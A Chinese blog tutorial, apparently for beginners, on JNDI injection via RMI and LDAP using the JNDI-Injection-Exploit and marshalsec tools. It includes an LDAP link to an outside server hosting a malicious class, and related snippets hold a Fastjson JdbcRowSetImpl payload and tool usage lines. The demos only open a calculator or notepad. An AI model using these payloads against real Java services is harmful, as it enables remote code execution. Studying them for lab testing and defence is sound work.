JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)

最新推荐文章于 2024-05-19 09:49:26 发布
最新推荐文章于 2024-05-19 09:49:26 发布
阅读量1k 收藏 3
点赞数 1
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68064663/article/details/132860647
版权

目录

JNDI远程调用-JNDI-Injection

JNDI远程调用-marshalsec

JNDI远程调用-JNDI-Injection

JNDI是java系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器

使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器

写一个class文件,创建一个rmi ldap等服务调用实例化对象,调用这个地址:ldap://47.94.236.117:1389/nx5qkh

47.94.236.117服务器产生回显:

弹出计算器:

JNDI-Injection-Exploit-1.0-SNAPSHOT-all直接生成class文件,无需手动,ldap默认开放1389 端口,rmi默认开放1099端口

JNDI远程调用-marshalsec

编写一个Test.java用于执行notepad,编译成class文件

上传到服务器

访问默认下载

重新生成一个,用rmi协议请求Test,监听端口1099

http://0.0.0.0/#Test表示Test在网站目录的下载路径,0.0.0.0表示所有端口

调用rmi远程链接

服务器弹出记事本

marshalsec需要手动生成class文件

JNDI-Injection和marshalsec都可以生成rmi和ldap的远程调用地址

似锦c
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
JNDI-Injection-Exploit:JNDI注入测试工具(生成JNDI链接的工具可以启动多个服务器来利用JNDI Injection漏洞,例如Jackson,Fastjson等)
05-07
JNDI注入漏洞 描述 JNDI-Injection-Exploit是用于生成可用的JNDI链接并通过启动RMI服务器LDAP服务器和HTTP服务器来提供后台服务的工具。 RMI服务器LDAP服务器基于并进行了进一步修改以与HTTP服务器链接。 使用此工具可以获取JNDI链接,可以将这些链接插入POC以测试漏洞。 例如,这是一个Fastjson vul-poc: { " @type " : " com.sun.rowset.JdbcRowSetImpl " , " dataSourceName " : " rmi://127.0.0.1:1099/Object " , " autoCommit " : true } 我们可以用JNDI-Injection-Exploit生成的链接替换“ rmi://127.0.0.1:1099 / Object”,以测试漏洞。 免责声明 所有信
JNDI注入&Log4j&FastJson&白盒审计&不回显处理_log4j 攻击无回显怎么办(1)
2401_83944596的博客
04-11 970
在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。FastJson是阿里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。Java 其实是有原生 Json 数据格式转换的,但由于 FastJson 速度更快,效率更高,所以被广泛使用。
探索Java安全新边界:JNDI-Inject-Exploit
最新发布
gitblog_00011的博客
05-19 314
探索Java安全新边界:JNDI-Inject-Exploit 项目地址:https://gitcode.com/exp1orer/JNDI-Inject-Exploit 1、项目介绍 JNDI-Inject-Exploit 是一个强大的工具,专门针对Fastjson、log4j2和原生JNDI注入漏洞进行检测和利用。它有效地解决了针对高版本JDK的Bypass问题,允许在具有反序列化Gadget...
虚拟ldap服务器,什么是LDAPLDAP服务器是什么?
weixin_28989357的博客
08-13 735
从上述定义不难看出LDAP是一个目录,那么该目录是如何出现,有什么用呢?在当今的信息世界,网络为人们提供了丰富的资源。随着网络资源的日益丰富,迫切需要一种能有效管理资源信息并利于检索查询的服务技术。目录服务技术随之产生。1.LDAP目录服务可以有效地解决众多网络服务的用户账户问题。2.LDAP目录服务规定了统一的身份信息数据库、身份认证机制和接口,实现了资源和信息的统一管理,保证了数据的一致性和完...
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 3628
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
java 反序列化利用工具 marshalsec 使用简介
热门推荐
whatday的专栏
08-11 2万+
命令格式 marshalsec命令格式如下: java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]] 参数说明: -a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, Spri
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5148
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
rmi-jndi-ldap-jrmp-jmx-jms:rmijndildap,jrmp,jmx,jms一些演示测试
03-08
在IT领域,特别是Java开发中,`RMI`(Remote Method Invocation)、`JNDI`(Java Naming and Directory Interface)、`LDAP`(Lightweight Directory Access Protocol)、`JRMP`(Java Remote Method Protocol)、`...
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
05-27
整合rmildap服务器+恶意类,使用方法: $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] where: -C - command executed in the remote classfile. (optional , ...
jndi-tool JNDI服务利用工具
01-06
JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具
JavaEE5学习笔记02-JNDIRMI
05-10
JavaEE5是一个企业级的Java开发平台,它包含了许多组件和服务,如JNDI(Java Naming and Directory Interface)和RMI(Remote Method Invocation)。这两项技术在JavaEE中扮演着重要的角色,帮助开发者构建分布式、...
安全学习_开发相关_JNDI介绍(注入)&RMI&LDAP服务
学废了的阿串的博客
10-05 1087
JNDI概念、RMI&LDAP服务JNDI注入-使用工具生成远程调用、jndi-injection、marshalsec、案例、JNDI注入-JDK高版本注入绕过
JNDI-Injection-Exploit项目介绍
gitblog_00055的博客
03-23 334
JNDI-Injection-Exploit项目介绍 项目地址:https://gitcode.com/welk1n/JNDI-Injection-Exploit 简介 JNDI-Injection-Exploit是一款基于Java Naming and Directory Interface(JNDI)的漏洞利用工具,可以用于远程命令执行、文件上传和反序列化攻击等。该项目的代码托管在GitCod...
log4j漏洞 成因 原理 jndi ldap
whatday的专栏
11-22 644
所以目录天生是用来查询的,就好像它的名字一样。PS:有时候Java对象比较大,直接通过LDAP这些存储不方便,就整了个类似于二次跳转的意思,不直接返回对象内容,而是告诉你对象在哪个class里,让你去那里找。假如现在想要通过日志输出一个Java对象,但这个对象不在程序中,而是在其他地方,比如可能在某个文件中,甚至可能在网络上的某个地方,这种时候怎么办呢?lookup,顾名思义就是查找、搜索的意思,那在log4j2中,就是允许在输出日志的时候,通过某种方式去查找要输出的内容。
JNDI注入
Christ1na的博客
11-17 752
JNDI(The Java Naming and Directory Interface,Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API,命名服务将名称和对象联系起来,使得我们可以用名称访问对象。
log4j2漏洞复现(CVE-2021-44228)
lionwerson的博客
12-29 3481
log4j2漏洞复现(CVE-2021-44228) 漏洞简介: log4j是Apache公司的一款JAVA日志框架,基本上只要是java的框架都会用到这个log4j框架,所以上周不管是不是IT圈的都几乎被刷屏了,可见这个洞的危害之大,波及范围之广。所以复现一下。 影响版本: Apache Log4j 2.x >=2.0-beta9 且 < 2.15.0 复现环境1: 1.log4shell-vulnerable-app环境: docker run --name vulnerable-a
JNDI注入+高版本绕过+工具使用
GalaxySpaceX的博客
06-21 2370
JNDI注入+高版本绕过+工具使用
JNDI-Injection-Exploit工具安装
arissa666的博客
10-17 712
注意需要在.jar的目录写命令,或者java -jar 后面加上目录。配置完成之后就可以看到mvn版本信息了。因为提示mvn错误,解决下报错问题。执行一个本地调用计算机命令。从github上下载安装。
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9397
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务LDAP(Lightweight Dir
jndi可以调用LDAP RMI
07-25
是的,JNDI(Java Naming and Directory Interface)可以用于调用LDAP(Lightweight Directory Access Protocol)和RMI(Remote Method Invocation)。 1. JNDILDAP: - JNDI提供了一种标准的Java API,用于通过命名和目录服务访问和操作各种命名和目录服务,包括LDAP。 - JNDI允许开发者通过统一的方式连接和操作LDAP服务器,执行搜索、读取、写入和修改等操作。 - 通过JNDI,可以使用LDAP协议与LDAP服务器进行通信,查询和管理存储在LDAP目录中的数据。 2. JNDIRMI: - JNDI也可以用于查找和访问远程对象,包括使用RMI进行远程方法调用。 - RMI使用JNDI的命名服务来查找远程对象的引用,从而实现客户端与远程对象之间的通信。 - 通过JNDI,可以在分布式系统中定位和获取RMI服务的引用,从而实现远程方法调用。 总结而言,JNDI是一个用于访问和操作各种命名和目录服务的Java API,包括LDAPRMI。通过JNDI,可以与LDAP服务器进行通信并操作存储在LDAP目录中的数据,也可以定位和获取远程对象的引用,实现RMI的远程方法调用。 希望以上信息对你有所帮助!如果你还有其他关于JNDILDAPRMI的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值